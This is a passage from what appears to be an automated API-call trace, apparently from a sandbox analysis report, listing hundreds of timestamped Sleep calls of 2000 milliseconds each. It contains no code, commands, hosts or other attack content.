(dwMilliseconds=0x7d0) [0236.317] Sleep (dwMilliseconds=0x7d0) [0236.323] Sleep (dwMilliseconds=0x7d0) [0236.324] Sleep (dwMilliseconds=0x7d0) [0236.330] Sleep (dwMilliseconds=0x7d0) [0236.331] Sleep (dwMilliseconds=0x7d0) [0236.336] Sleep (dwMilliseconds=0x7d0) [0236.338] Sleep (dwMilliseconds=0x7d0) [0236.350] Sleep (dwMilliseconds=0x7d0) [0236.352] Sleep (dwMilliseconds=0x7d0) [0236.358] Sleep (dwMilliseconds=0x7d0) [0236.360] Sleep (dwMilliseconds=0x7d0) [0236.365] Sleep (dwMilliseconds=0x7d0) [0236.367] Sleep (dwMilliseconds=0x7d0) [0236.372] Sleep (dwMilliseconds=0x7d0) [0236.374] Sleep (dwMilliseconds=0x7d0) [0236.376] Sleep (dwMilliseconds=0x7d0) [0236.379] Sleep (dwMilliseconds=0x7d0) [0236.381] Sleep (dwMilliseconds=0x7d0) [0236.386] Sleep (dwMilliseconds=0x7d0) [0236.395] Sleep (dwMilliseconds=0x7d0) [0236.397] Sleep (dwMilliseconds=0x7d0) [0236.404] Sleep (dwMilliseconds=0x7d0) [0236.405] Sleep (dwMilliseconds=0x7d0) [0236.414] Sleep (dwMilliseconds=0x7d0) [0236.421] Sleep (dwMilliseconds=0x7d0) [0236.423] Sleep (dwMilliseconds=0x7d0) [0236.428] Sleep (dwMilliseconds=0x7d0) [0236.430] Sleep (dwMilliseconds=0x7d0) [0236.435] Sleep (dwMilliseconds=0x7d0) [0236.437] Sleep (dwMilliseconds=0x7d0) [0236.443] Sleep (dwMilliseconds=0x7d0) [0236.444] Sleep (dwMilliseconds=0x7d0) [0236.452] Sleep (dwMilliseconds=0x7d0) [0236.453] Sleep (dwMilliseconds=0x7d0) [0236.461] Sleep (dwMilliseconds=0x7d0) [0236.466] Sleep (dwMilliseconds=0x7d0) [0236.469] Sleep (dwMilliseconds=0x7d0) [0236.477] Sleep (dwMilliseconds=0x7d0) [0236.483] Sleep (dwMilliseconds=0x7d0) [0236.484] Sleep (dwMilliseconds=0x7d0) [0236.490] Sleep (dwMilliseconds=0x7d0) [0236.491] Sleep (dwMilliseconds=0x7d0) [0236.497] Sleep (dwMilliseconds=0x7d0) [0236.498] Sleep (dwMilliseconds=0x7d0) [0236.504] Sleep (dwMilliseconds=0x7d0) [0236.510] Sleep (dwMilliseconds=0x7d0) [0236.511] Sleep (dwMilliseconds=0x7d0) [0236.513] Sleep (dwMilliseconds=0x7d0) [0236.518] Sleep (dwMilliseconds=0x7d0) [0236.524] Sleep (dwMilliseconds=0x7d0) [0236.525] Sleep (dwMilliseconds=0x7d0) [0236.567] Sleep (dwMilliseconds=0x7d0) [0236.575] Sleep (dwMilliseconds=0x7d0) [0236.582] Sleep (dwMilliseconds=0x7d0) [0236.584] Sleep (dwMilliseconds=0x7d0) [0236.590] Sleep (dwMilliseconds=0x7d0) [0236.595] Sleep (dwMilliseconds=0x7d0) [0236.597] Sleep (dwMilliseconds=0x7d0) [0236.598] Sleep (dwMilliseconds=0x7d0) [0236.604] Sleep (dwMilliseconds=0x7d0) [0236.611] Sleep (dwMilliseconds=0x7d0) [0236.612] Sleep (dwMilliseconds=0x7d0) [0236.619] Sleep (dwMilliseconds=0x7d0) [0236.621] Sleep (dwMilliseconds=0x7d0) [0236.627] Sleep (dwMilliseconds=0x7d0) [0236.628] Sleep (dwMilliseconds=0x7d0) [0236.635] Sleep (dwMilliseconds=0x7d0) [0236.636] Sleep (dwMilliseconds=0x7d0) [0236.643] Sleep (dwMilliseconds=0x7d0) [0236.644] Sleep (dwMilliseconds=0x7d0) [0236.646] Sleep (dwMilliseconds=0x7d0) [0236.652] Sleep (dwMilliseconds=0x7d0) [0236.654] Sleep (dwMilliseconds=0x7d0) [0236.666] Sleep (dwMilliseconds=0x7d0) [0236.673] Sleep (dwMilliseconds=0x7d0) [0236.675] Sleep (dwMilliseconds=0x7d0) [0236.681] Sleep (dwMilliseconds=0x7d0) [0236.682] Sleep (dwMilliseconds=0x7d0) [0236.687] Sleep (dwMilliseconds=0x7d0) [0236.689] Sleep (dwMilliseconds=0x7d0) [0236.690] Sleep (dwMilliseconds=0x7d0) [0236.696] Sleep (dwMilliseconds=0x7d0) [0236.697] Sleep (dwMilliseconds=0x7d0) [0236.704] Sleep (dwMilliseconds=0x7d0) [0236.713] Sleep (dwMilliseconds=0x7d0) [0236.724] Sleep (dwMilliseconds=0x7d0) [0236.732] Sleep (dwMilliseconds=0x7d0) [0236.734] Sleep (dwMilliseconds=0x7d0) [0236.735] Sleep (dwMilliseconds=0x7d0) [0236.740] Sleep (dwMilliseconds=0x7d0) [0236.742] Sleep (dwMilliseconds=0x7d0) [0236.748] Sleep (dwMilliseconds=0x7d0) [0236.754] Sleep (dwMilliseconds=0x7d0) [0236.756] Sleep (dwMilliseconds=0x7d0) [0236.762] Sleep (dwMilliseconds=0x7d0) [0236.763] Sleep (dwMilliseconds=0x7d0) [0236.769] Sleep (dwMilliseconds=0x7d0) [0236.771] Sleep (dwMilliseconds=0x7d0) [0236.777] Sleep (dwMilliseconds=0x7d0) [0236.778] Sleep (dwMilliseconds=0x7d0) [0236.786] Sleep (dwMilliseconds=0x7d0) [0236.787] Sleep (dwMilliseconds=0x7d0) [0236.793] Sleep (dwMilliseconds=0x7d0) [0236.800] Sleep (dwMilliseconds=0x7d0) [0236.801] Sleep (dwMilliseconds=0x7d0) [0236.807] Sleep (dwMilliseconds=0x7d0) [0236.815] Sleep (dwMilliseconds=0x7d0) [0236.816] Sleep (dwMilliseconds=0x7d0) [0236.822] Sleep (dwMilliseconds=0x7d0) [0236.823] Sleep (dwMilliseconds=0x7d0) [0236.825] Sleep (dwMilliseconds=0x7d0) [0236.831] Sleep (dwMilliseconds=0x7d0) [0236.832] Sleep (dwMilliseconds=0x7d0) [0236.841] Sleep (dwMilliseconds=0x7d0) [0236.851] Sleep (dwMilliseconds=0x7d0) [0236.852] Sleep (dwMilliseconds=0x7d0) [0236.861] Sleep (dwMilliseconds=0x7d0) [0236.862] Sleep (dwMilliseconds=0x7d0) [0236.867] Sleep (dwMilliseconds=0x7d0) [0236.869] Sleep (dwMilliseconds=0x7d0) [0236.870] Sleep (dwMilliseconds=0x7d0) [0236.876] Sleep (dwMilliseconds=0x7d0) [0236.882] Sleep (dwMilliseconds=0x7d0) [0236.884] Sleep (dwMilliseconds=0x7d0) [0236.890] Sleep (dwMilliseconds=0x7d0) [0236.897] Sleep (dwMilliseconds=0x7d0) [0236.898] Sleep (dwMilliseconds=0x7d0) [0236.905] Sleep (dwMilliseconds=0x7d0) [0236.907] Sleep (dwMilliseconds=0x7d0) [0236.915] Sleep (dwMilliseconds=0x7d0) [0236.921] Sleep (dwMilliseconds=0x7d0) [0236.924] Sleep (dwMilliseconds=0x7d0) [0236.932] Sleep (dwMilliseconds=0x7d0) [0236.941] Sleep (dwMilliseconds=0x7d0) [0236.943] Sleep (dwMilliseconds=0x7d0) [0236.949] Sleep (dwMilliseconds=0x7d0) [0236.950] Sleep (dwMilliseconds=0x7d0) [0236.959] Sleep (dwMilliseconds=0x7d0) [0236.960] Sleep (dwMilliseconds=0x7d0) [0236.964] Sleep (dwMilliseconds=0x7d0) [0236.966] Sleep (dwMilliseconds=0x7d0) [0236.967] Sleep (dwMilliseconds=0x7d0) [0236.973] Sleep (dwMilliseconds=0x7d0) [0236.974] Sleep (dwMilliseconds=0x7d0) [0236.980] Sleep (dwMilliseconds=0x7d0) [0236.981] Sleep (dwMilliseconds=0x7d0) [0236.987] Sleep (dwMilliseconds=0x7d0) [0236.998] Sleep (dwMilliseconds=0x7d0) [0237.004] Sleep (dwMilliseconds=0x7d0) [0237.006] Sleep (dwMilliseconds=0x7d0) [0237.010] Sleep (dwMilliseconds=0x7d0) [0237.012] Sleep (dwMilliseconds=0x7d0) [0237.013] Sleep (dwMilliseconds=0x7d0) [0237.020] Sleep (dwMilliseconds=0x7d0) [0237.070] Sleep (dwMilliseconds=0x7d0) [0237.071] Sleep (dwMilliseconds=0x7d0) [0237.079] Sleep (dwMilliseconds=0x7d0) [0237.087] Sleep (dwMilliseconds=0x7d0) [0237.095] Sleep (dwMilliseconds=0x7d0) [0237.096] Sleep (dwMilliseconds=0x7d0) [0237.103] Sleep (dwMilliseconds=0x7d0) [0237.105] Sleep (dwMilliseconds=0x7d0) [0237.114] Sleep (dwMilliseconds=0x7d0) [0237.121] Sleep (dwMilliseconds=0x7d0) [0237.122] Sleep (dwMilliseconds=0x7d0) [0237.130] Sleep (dwMilliseconds=0x7d0) [0237.131] Sleep (dwMilliseconds=0x7d0) [0237.137] Sleep (dwMilliseconds=0x7d0) [0237.139] Sleep (dwMilliseconds=0x7d0) [0237.147] Sleep (dwMilliseconds=0x7d0) [0237.148] Sleep (dwMilliseconds=0x7d0) [0237.156] Sleep (dwMilliseconds=0x7d0) [0237.164] Sleep (dwMilliseconds=0x7d0) [0237.166] Sleep (dwMilliseconds=0x7d0) [0237.175] Sleep (dwMilliseconds=0x7d0) [0237.178] Sleep (dwMilliseconds=0x7d0) [0237.185] Sleep (dwMilliseconds=0x7d0) [0237.186] Sleep (dwMilliseconds=0x7d0) [0237.216] Sleep (dwMilliseconds=0x7d0) [0237.218] Sleep (dwMilliseconds=0x7d0) [0237.220] Sleep (dwMilliseconds=0x7d0) [0237.226] Sleep (dwMilliseconds=0x7d0) [0237.232] Sleep (dwMilliseconds=0x7d0) [0237.233] Sleep (dwMilliseconds=0x7d0) [0237.244] Sleep (dwMilliseconds=0x7d0) [0237.245] Sleep (dwMilliseconds=0x7d0) [0237.253] Sleep (dwMilliseconds=0x7d0) [0237.255] Sleep (dwMilliseconds=0x7d0) [0237.264] Sleep (dwMilliseconds=0x7d0) [0237.265] Sleep (dwMilliseconds=0x7d0) [0237.270] Sleep (dwMilliseconds=0x7d0) [0237.273] Sleep (dwMilliseconds=0x7d0) [0237.275] Sleep (dwMilliseconds=0x7d0) [0237.284] Sleep (dwMilliseconds=0x7d0) [0237.294] Sleep (dwMilliseconds=0x7d0) [0237.313] Sleep (dwMilliseconds=0x7d0) [0237.315] Sleep (dwMilliseconds=0x7d0) [0237.323] Sleep (dwMilliseconds=0x7d0) [0237.326] Sleep (dwMilliseconds=0x7d0) [0237.333] Sleep (dwMilliseconds=0x7d0) [0237.335] Sleep (dwMilliseconds=0x7d0) [0237.353] Sleep (dwMilliseconds=0x7d0) [0237.361] Sleep (dwMilliseconds=0x7d0) [0237.363] Sleep (dwMilliseconds=0x7d0) [0237.370] Sleep (dwMilliseconds=0x7d0) [0237.371] Sleep (dwMilliseconds=0x7d0) [0237.378] Sleep (dwMilliseconds=0x7d0) [0237.386] Sleep (dwMilliseconds=0x7d0) [0237.388] Sleep (dwMilliseconds=0x7d0) [0237.395] Sleep (dwMilliseconds=0x7d0) [0237.397] Sleep (dwMilliseconds=0x7d0) [0237.404] Sleep (dwMilliseconds=0x7d0) [0237.406] Sleep (dwMilliseconds=0x7d0) [0237.413] Sleep (dwMilliseconds=0x7d0) [0237.415] Sleep (dwMilliseconds=0x7d0) [0237.422] Sleep (dwMilliseconds=0x7d0) [0237.424] Sleep (dwMilliseconds=0x7d0) [0237.434] Sleep (dwMilliseconds=0x7d0) [0237.443] Sleep (dwMilliseconds=0x7d0) [0237.445] Sleep (dwMilliseconds=0x7d0) [0237.452] Sleep (dwMilliseconds=0x7d0) [0237.454] Sleep (dwMilliseconds=0x7d0) [0237.461] Sleep (dwMilliseconds=0x7d0) [0237.466] Sleep (dwMilliseconds=0x7d0) [0237.470] Sleep (dwMilliseconds=0x7d0) [0237.480] Sleep (dwMilliseconds=0x7d0) [0237.481] Sleep (dwMilliseconds=0x7d0) [0237.489] Sleep (dwMilliseconds=0x7d0) [0237.491] Sleep (dwMilliseconds=0x7d0) [0237.498] Sleep (dwMilliseconds=0x7d0) [0237.499] Sleep (dwMilliseconds=0x7d0) [0237.506] Sleep (dwMilliseconds=0x7d0) [0237.508] Sleep (dwMilliseconds=0x7d0) [0237.511] Sleep (dwMilliseconds=0x7d0) [0237.517] Sleep (dwMilliseconds=0x7d0) [0237.518] Sleep (dwMilliseconds=0x7d0) [0237.527] Sleep (dwMilliseconds=0x7d0) [0237.535] Sleep (dwMilliseconds=0x7d0) [0237.536] Sleep (dwMilliseconds=0x7d0) [0237.545] Sleep (dwMilliseconds=0x7d0) [0237.553] Sleep (dwMilliseconds=0x7d0) [0237.554] Sleep (dwMilliseconds=0x7d0) [0237.561] Sleep (dwMilliseconds=0x7d0) [0237.563] Sleep (dwMilliseconds=0x7d0) [0237.570] Sleep (dwMilliseconds=0x7d0) [0237.571] Sleep (dwMilliseconds=0x7d0) [0237.578] Sleep (dwMilliseconds=0x7d0) [0237.580] Sleep (dwMilliseconds=0x7d0) [0237.587] Sleep (dwMilliseconds=0x7d0) [0237.588] Sleep (dwMilliseconds=0x7d0) [0237.596] Sleep (dwMilliseconds=0x7d0) [0237.598] Sleep (dwMilliseconds=0x7d0) [0237.600] Sleep (dwMilliseconds=0x7d0) [0237.605] Sleep (dwMilliseconds=0x7d0) [0237.614] Sleep (dwMilliseconds=0x7d0) [0237.616] Sleep (dwMilliseconds=0x7d0) [0237.623] Sleep (dwMilliseconds=0x7d0) [0237.625] Sleep (dwMilliseconds=0x7d0) [0237.634] Sleep (dwMilliseconds=0x7d0) [0237.635] Sleep (dwMilliseconds=0x7d0) [0237.643] Sleep (dwMilliseconds=0x7d0) [0237.645] Sleep (dwMilliseconds=0x7d0) [0237.651] Sleep (dwMilliseconds=0x7d0) [0237.653] Sleep (dwMilliseconds=0x7d0) [0237.661] Sleep (dwMilliseconds=0x7d0) [0237.671] Sleep (dwMilliseconds=0x7d0) [0237.673] Sleep (dwMilliseconds=0x7d0) [0237.680] Sleep (dwMilliseconds=0x7d0) [0237.682] Sleep (dwMilliseconds=0x7d0) [0237.689] Sleep (dwMilliseconds=0x7d0) [0237.691] Sleep (dwMilliseconds=0x7d0) [0237.692] Sleep (dwMilliseconds=0x7d0) [0237.703] Sleep (dwMilliseconds=0x7d0) [0237.704] Sleep (dwMilliseconds=0x7d0) [0237.711] Sleep (dwMilliseconds=0x7d0) [0237.713] Sleep (dwMilliseconds=0x7d0) [0237.721] Sleep (dwMilliseconds=0x7d0) [0237.723] Sleep (dwMilliseconds=0x7d0) [0237.732] Sleep (dwMilliseconds=0x7d0) [0237.738] Sleep (dwMilliseconds=0x7d0) [0237.741] Sleep (dwMilliseconds=0x7d0) [0237.742] Sleep (dwMilliseconds=0x7d0) [0237.750] Sleep (dwMilliseconds=0x7d0) [0237.752] Sleep (dwMilliseconds=0x7d0) [0237.759] Sleep (dwMilliseconds=0x7d0) [0237.772] Sleep (dwMilliseconds=0x7d0) [0237.773] Sleep (dwMilliseconds=0x7d0) [0237.781] Sleep (dwMilliseconds=0x7d0) [0237.783] Sleep (dwMilliseconds=0x7d0) [0237.787] Sleep (dwMilliseconds=0x7d0) [0237.792] Sleep (dwMilliseconds=0x7d0) [0237.793] Sleep (dwMilliseconds=0x7d0) [0237.800] Sleep (dwMilliseconds=0x7d0) [0237.802] Sleep (dwMilliseconds=0x7d0) [0237.809] Sleep (dwMilliseconds=0x7d0) [0237.811] Sleep (dwMilliseconds=0x7d0) [0237.818] Sleep (dwMilliseconds=0x7d0) [0237.820] Sleep (dwMilliseconds=0x7d0) [0237.827] Sleep (dwMilliseconds=0x7d0) [0237.833] Sleep (dwMilliseconds=0x7d0) [0237.838] Sleep (dwMilliseconds=0x7d0) [0237.839] Sleep (dwMilliseconds=0x7d0) [0237.849] Sleep (dwMilliseconds=0x7d0) [0237.850] Sleep (dwMilliseconds=0x7d0) [0237.858] Sleep (dwMilliseconds=0x7d0) [0237.860] Sleep (dwMilliseconds=0x7d0) [0237.867] Sleep (dwMilliseconds=0x7d0) [0237.875] Sleep (dwMilliseconds=0x7d0) [0237.877] Sleep (dwMilliseconds=0x7d0) [0237.885] Sleep (dwMilliseconds=0x7d0) [0237.894] Sleep (dwMilliseconds=0x7d0) [0237.896] Sleep (dwMilliseconds=0x7d0) [0237.903] Sleep (dwMilliseconds=0x7d0) [0237.905] Sleep (dwMilliseconds=0x7d0) [0237.912] Sleep (dwMilliseconds=0x7d0) [0237.913] Sleep (dwMilliseconds=0x7d0) [0237.920] Sleep (dwMilliseconds=0x7d0) [0237.921] Sleep (dwMilliseconds=0x7d0) [0237.929] Sleep (dwMilliseconds=0x7d0) [0237.930] Sleep (dwMilliseconds=0x7d0) [0237.939] Sleep (dwMilliseconds=0x7d0) [0237.950] Sleep (dwMilliseconds=0x7d0) [0237.951] Sleep (dwMilliseconds=0x7d0) [0237.958] Sleep (dwMilliseconds=0x7d0) [0237.966] Sleep (dwMilliseconds=0x7d0) [0237.967] Sleep (dwMilliseconds=0x7d0) [0237.975] Sleep (dwMilliseconds=0x7d0) [0237.976] Sleep (dwMilliseconds=0x7d0) [0237.984] Sleep (dwMilliseconds=0x7d0) [0237.986] Sleep (dwMilliseconds=0x7d0) [0237.994] Sleep (dwMilliseconds=0x7d0) [0238.010] Sleep (dwMilliseconds=0x7d0) [0238.018] Sleep (dwMilliseconds=0x7d0) [0238.019] Sleep (dwMilliseconds=0x7d0) [0238.021] Sleep (dwMilliseconds=0x7d0) [0238.056] Sleep (dwMilliseconds=0x7d0) [0238.057] Sleep (dwMilliseconds=0x7d0) [0238.065] Sleep (dwMilliseconds=0x7d0) [0238.066] Sleep (dwMilliseconds=0x7d0) [0238.073] Sleep (dwMilliseconds=0x7d0) [0238.074] Sleep (dwMilliseconds=0x7d0) [0238.080] Sleep (dwMilliseconds=0x7d0) [0238.081] Sleep (dwMilliseconds=0x7d0) [0238.087] Sleep (dwMilliseconds=0x7d0) [0238.088] Sleep (dwMilliseconds=0x7d0) [0238.094] Sleep (dwMilliseconds=0x7d0) [0238.095] Sleep (dwMilliseconds=0x7d0) [0238.100] Sleep (dwMilliseconds=0x7d0) [0238.103] Sleep (dwMilliseconds=0x7d0) [0238.108] Sleep (dwMilliseconds=0x7d0) [0238.109] Sleep (dwMilliseconds=0x7d0) [0238.116] Sleep (dwMilliseconds=0x7d0) [0238.124] Sleep (dwMilliseconds=0x7d0) [0238.125] Sleep (dwMilliseconds=0x7d0) [0238.132] Sleep (dwMilliseconds=0x7d0) [0238.133] Sleep (dwMilliseconds=0x7d0) [0238.136] Sleep (dwMilliseconds=0x7d0) [0238.139] Sleep (dwMilliseconds=0x7d0) [0238.141] Sleep (dwMilliseconds=0x7d0) [0238.147] Sleep (dwMilliseconds=0x7d0) [0238.155] Sleep (dwMilliseconds=0x7d0) [0238.156] Sleep (dwMilliseconds=0x7d0) [0238.162] Sleep (dwMilliseconds=0x7d0) [0238.164] Sleep (dwMilliseconds=0x7d0) [0238.170] Sleep (dwMilliseconds=0x7d0) [0238.171] Sleep (dwMilliseconds=0x7d0) [0238.177] Sleep (dwMilliseconds=0x7d0) [0238.178] Sleep (dwMilliseconds=0x7d0) [0238.182] Sleep (dwMilliseconds=0x7d0) [0238.184] Sleep (dwMilliseconds=0x7d0) [0238.191] Sleep (dwMilliseconds=0x7d0) [0238.193] Sleep (dwMilliseconds=0x7d0) [0238.200] Sleep (dwMilliseconds=0x7d0) [0238.201] Sleep (dwMilliseconds=0x7d0) [0238.207] Sleep (dwMilliseconds=0x7d0) [0238.209] Sleep (dwMilliseconds=0x7d0) [0238.215] Sleep (dwMilliseconds=0x7d0) [0238.216] Sleep (dwMilliseconds=0x7d0) [0238.223] Sleep (dwMilliseconds=0x7d0) [0238.228] Sleep (dwMilliseconds=0x7d0) [0238.232] Sleep (dwMilliseconds=0x7d0) [0238.233] Sleep (dwMilliseconds=0x7d0) [0238.240] Sleep (dwMilliseconds=0x7d0) [0238.241] Sleep (dwMilliseconds=0x7d0) [0238.248] Sleep (dwMilliseconds=0x7d0) [0238.250] Sleep (dwMilliseconds=0x7d0) [0238.257] Sleep (dwMilliseconds=0x7d0) [0238.263] Sleep (dwMilliseconds=0x7d0) [0238.265] Sleep (dwMilliseconds=0x7d0) [0238.271] Sleep (dwMilliseconds=0x7d0) [0238.272] Sleep (dwMilliseconds=0x7d0) [0238.274] Sleep (dwMilliseconds=0x7d0) [0238.282] Sleep (dwMilliseconds=0x7d0) [0238.284] Sleep (dwMilliseconds=0x7d0) [0238.291] Sleep (dwMilliseconds=0x7d0) [0238.293] Sleep (dwMilliseconds=0x7d0) [0238.316] Sleep (dwMilliseconds=0x7d0) [0238.325] Sleep (dwMilliseconds=0x7d0) [0238.333] Sleep (dwMilliseconds=0x7d0) [0238.337] Sleep (dwMilliseconds=0x7d0) [0238.347] Sleep (dwMilliseconds=0x7d0) [0238.348] Sleep (dwMilliseconds=0x7d0) [0238.356] Sleep (dwMilliseconds=0x7d0) [0238.364] Sleep (dwMilliseconds=0x7d0) [0238.373] Sleep (dwMilliseconds=0x7d0) [0238.374] Sleep (dwMilliseconds=0x7d0) [0238.381] Sleep (dwMilliseconds=0x7d0) [0238.383] Sleep (dwMilliseconds=0x7d0) [0238.388] Sleep (dwMilliseconds=0x7d0) [0238.390] Sleep (dwMilliseconds=0x7d0) [0238.397] Sleep (dwMilliseconds=0x7d0) [0238.403] Sleep (dwMilliseconds=0x7d0) [0238.405] Sleep (dwMilliseconds=0x7d0) [0238.411] Sleep (dwMilliseconds=0x7d0) [0238.413] Sleep (dwMilliseconds=0x7d0) [0238.419] Sleep (dwMilliseconds=0x7d0) [0238.420] Sleep (dwMilliseconds=0x7d0) [0238.427] Sleep (dwMilliseconds=0x7d0) [0238.432] Sleep (dwMilliseconds=0x7d0) [0238.435] Sleep (dwMilliseconds=0x7d0) [0238.441] Sleep (dwMilliseconds=0x7d0) [0238.452] Sleep (dwMilliseconds=0x7d0) [0238.453] Sleep (dwMilliseconds=0x7d0) [0238.461] Sleep (dwMilliseconds=0x7d0) [0238.463] Sleep (dwMilliseconds=0x7d0) [0238.468] Sleep (dwMilliseconds=0x7d0) [0238.470] Sleep (dwMilliseconds=0x7d0) [0238.477] Sleep (dwMilliseconds=0x7d0) [0238.478] Sleep (dwMilliseconds=0x7d0) [0238.484] Sleep (dwMilliseconds=0x7d0) [0238.486] Sleep (dwMilliseconds=0x7d0) [0238.492] Sleep (dwMilliseconds=0x7d0) [0238.493] Sleep (dwMilliseconds=0x7d0) [0238.499] Sleep (dwMilliseconds=0x7d0) [0238.500] Sleep (dwMilliseconds=0x7d0) [0238.506] Sleep (dwMilliseconds=0x7d0) [0238.515] Sleep (dwMilliseconds=0x7d0) [0238.516] Sleep (dwMilliseconds=0x7d0) [0238.521] Sleep (dwMilliseconds=0x7d0) [0238.522] Sleep (dwMilliseconds=0x7d0) [0238.524] Sleep (dwMilliseconds=0x7d0) [0238.530] Sleep (dwMilliseconds=0x7d0) [0238.532] Sleep (dwMilliseconds=0x7d0) [0238.538] Sleep (dwMilliseconds=0x7d0) [0238.546] Sleep (dwMilliseconds=0x7d0) [0238.547] Sleep (dwMilliseconds=0x7d0) [0238.554] Sleep (dwMilliseconds=0x7d0) [0238.555] Sleep (dwMilliseconds=0x7d0) [0238.563] Sleep (dwMilliseconds=0x7d0) [0238.564] Sleep (dwMilliseconds=0x7d0) [0238.568] Sleep (dwMilliseconds=0x7d0) [0238.570] Sleep (dwMilliseconds=0x7d0) [0238.571] Sleep (dwMilliseconds=0x7d0) [0238.578] Sleep (dwMilliseconds=0x7d0) [0238.580] Sleep (dwMilliseconds=0x7d0) [0238.587] Sleep (dwMilliseconds=0x7d0) [0238.599] Sleep (dwMilliseconds=0x7d0) [0238.600] Sleep (dwMilliseconds=0x7d0) [0238.606] Sleep (dwMilliseconds=0x7d0) [0238.612] Sleep (dwMilliseconds=0x7d0) [0238.613] Sleep (dwMilliseconds=0x7d0) [0238.615] Sleep (dwMilliseconds=0x7d0) [0238.619] Sleep (dwMilliseconds=0x7d0) [0238.627] Sleep (dwMilliseconds=0x7d0) [0238.628] Sleep (dwMilliseconds=0x7d0) [0238.634] Sleep (dwMilliseconds=0x7d0) [0238.641] Sleep (dwMilliseconds=0x7d0) [0238.642] Sleep (dwMilliseconds=0x7d0) [0238.649] Sleep (dwMilliseconds=0x7d0) [0238.651] Sleep (dwMilliseconds=0x7d0) [0238.658] Sleep (dwMilliseconds=0x7d0) [0238.660] Sleep (dwMilliseconds=0x7d0) [0238.669] Sleep (dwMilliseconds=0x7d0) [0238.676] Sleep (dwMilliseconds=0x7d0) [0238.677] Sleep (dwMilliseconds=0x7d0) [0238.683] Sleep (dwMilliseconds=0x7d0) [0238.690] Sleep (dwMilliseconds=0x7d0) [0238.691] Sleep (dwMilliseconds=0x7d0) [0238.698] Sleep (dwMilliseconds=0x7d0) [0238.702] Sleep (dwMilliseconds=0x7d0) [0238.706] Sleep (dwMilliseconds=0x7d0) [0238.707] Sleep (dwMilliseconds=0x7d0) [0238.715] Sleep (dwMilliseconds=0x7d0) [0238.723] Sleep (dwMilliseconds=0x7d0) [0238.724] Sleep (dwMilliseconds=0x7d0) [0238.731] Sleep (dwMilliseconds=0x7d0) [0238.738] Sleep (dwMilliseconds=0x7d0) [0238.740] Sleep (dwMilliseconds=0x7d0) [0238.748] Sleep (dwMilliseconds=0x7d0) [0238.750] Sleep (dwMilliseconds=0x7d0) [0238.757] Sleep (dwMilliseconds=0x7d0) [0238.758] Sleep (dwMilliseconds=0x7d0) [0238.767] Sleep (dwMilliseconds=0x7d0) [0238.776] Sleep (dwMilliseconds=0x7d0) [0238.783] Sleep (dwMilliseconds=0x7d0) [0238.785] Sleep (dwMilliseconds=0x7d0) [0238.791] Sleep (dwMilliseconds=0x7d0) [0238.795] Sleep (dwMilliseconds=0x7d0) [0238.798] Sleep (dwMilliseconds=0x7d0) [0238.799] Sleep (dwMilliseconds=0x7d0) [0238.805] Sleep (dwMilliseconds=0x7d0) [0238.806] Sleep (dwMilliseconds=0x7d0) [0238.813] Sleep (dwMilliseconds=0x7d0) [0238.819] Sleep (dwMilliseconds=0x7d0) [0238.821] Sleep (dwMilliseconds=0x7d0) [0238.826] Sleep (dwMilliseconds=0x7d0) [0238.828] Sleep (dwMilliseconds=0x7d0) [0238.835] Sleep (dwMilliseconds=0x7d0) [0238.840] Sleep (dwMilliseconds=0x7d0) [0238.844] Sleep (dwMilliseconds=0x7d0) [0238.851] Sleep (dwMilliseconds=0x7d0) [0238.860] Sleep (dwMilliseconds=0x7d0) [0238.868] Sleep (dwMilliseconds=0x7d0) [0238.877] Sleep (dwMilliseconds=0x7d0) [0238.878] Sleep (dwMilliseconds=0x7d0) [0238.884] Sleep (dwMilliseconds=0x7d0) [0238.886] Sleep (dwMilliseconds=0x7d0) [0238.887] Sleep (dwMilliseconds=0x7d0) [0238.894] Sleep (dwMilliseconds=0x7d0) [0238.932] Sleep (dwMilliseconds=0x7d0) [0238.941] Sleep (dwMilliseconds=0x7d0) [0238.943] Sleep (dwMilliseconds=0x7d0) [0238.951] Sleep (dwMilliseconds=0x7d0) [0238.953] Sleep (dwMilliseconds=0x7d0) [0238.960] Sleep (dwMilliseconds=0x7d0) [0238.962] Sleep (dwMilliseconds=0x7d0) [0238.969] Sleep (dwMilliseconds=0x7d0) [0238.976] Sleep (dwMilliseconds=0x7d0) [0238.983] Sleep (dwMilliseconds=0x7d0) [0238.984] Sleep (dwMilliseconds=0x7d0) [0238.990] Sleep (dwMilliseconds=0x7d0) [0238.991] Sleep (dwMilliseconds=0x7d0) [0238.997] Sleep (dwMilliseconds=0x7d0) [0238.999] Sleep (dwMilliseconds=0x7d0) [0239.004] Sleep (dwMilliseconds=0x7d0) [0239.012] Sleep (dwMilliseconds=0x7d0) [0239.013] Sleep (dwMilliseconds=0x7d0) [0239.019] Sleep (dwMilliseconds=0x7d0) [0239.026] Sleep (dwMilliseconds=0x7d0) [0239.049] Sleep (dwMilliseconds=0x7d0) [0239.058] Sleep (dwMilliseconds=0x7d0) [0239.067] Sleep (dwMilliseconds=0x7d0) [0239.068] Sleep (dwMilliseconds=0x7d0) [0239.070] Sleep (dwMilliseconds=0x7d0) [0239.076] Sleep (dwMilliseconds=0x7d0) [0239.083] Sleep (dwMilliseconds=0x7d0) [0239.085] Sleep (dwMilliseconds=0x7d0) [0239.090] Sleep (dwMilliseconds=0x7d0) [0239.092] Sleep (dwMilliseconds=0x7d0) [0239.099] Sleep (dwMilliseconds=0x7d0) [0239.107] Sleep (dwMilliseconds=0x7d0) [0239.116] Sleep (dwMilliseconds=0x7d0) [0239.118] Sleep (dwMilliseconds=0x7d0) [0239.125] Sleep (dwMilliseconds=0x7d0) [0239.222] Sleep (dwMilliseconds=0x7d0) [0239.225] Sleep (dwMilliseconds=0x7d0) [0239.231] Sleep (dwMilliseconds=0x7d0) [0239.233] Sleep (dwMilliseconds=0x7d0) [0239.239] Sleep (dwMilliseconds=0x7d0) [0239.241] Sleep (dwMilliseconds=0x7d0) [0239.247] Sleep (dwMilliseconds=0x7d0) [0239.249] Sleep (dwMilliseconds=0x7d0) [0239.254] Sleep (dwMilliseconds=0x7d0) [0239.255] Sleep (dwMilliseconds=0x7d0) [0239.262] Sleep (dwMilliseconds=0x7d0) [0239.264] Sleep (dwMilliseconds=0x7d0) [0239.271] Sleep (dwMilliseconds=0x7d0) [0239.278] Sleep (dwMilliseconds=0x7d0) [0239.279] Sleep (dwMilliseconds=0x7d0) [0239.285] Sleep (dwMilliseconds=0x7d0) [0239.295] Sleep (dwMilliseconds=0x7d0) [0239.302] Sleep (dwMilliseconds=0x7d0) [0239.303] Sleep (dwMilliseconds=0x7d0) [0239.309] Sleep (dwMilliseconds=0x7d0) [0239.348] Sleep (dwMilliseconds=0x7d0) [0239.350] Sleep (dwMilliseconds=0x7d0) [0239.356] 